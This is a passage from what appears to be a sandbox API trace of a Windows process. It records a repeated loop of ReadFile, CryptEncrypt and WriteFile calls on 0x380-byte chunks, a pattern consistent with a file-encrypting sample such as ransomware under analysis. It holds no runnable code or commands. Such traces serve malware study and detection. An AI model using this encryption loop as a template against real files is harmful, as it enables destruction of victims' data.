lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.360] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.360] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.360] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.360] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.360] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.360] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.361] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.361] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.361] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.361] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.361] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.361] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.361] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.361] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.361] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.361] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.361] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.362] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.362] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.362] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.362] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.362] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.362] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.362] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.362] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.362] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.362] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.363] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.363] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.363] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.363] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.363] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.363] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.363] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.363] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.363] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.363] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.363] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.363] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.364] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.364] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.364] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.364] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.364] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.364] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.364] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.364] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.364] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.364] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.365] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.365] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.365] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.365] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.365] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.365] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.365] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.365] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.365] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.365] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.366] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.366] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.366] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.366] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.366] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.366] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.366] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.367] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.367] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.367] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.367] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.367] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.367] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, 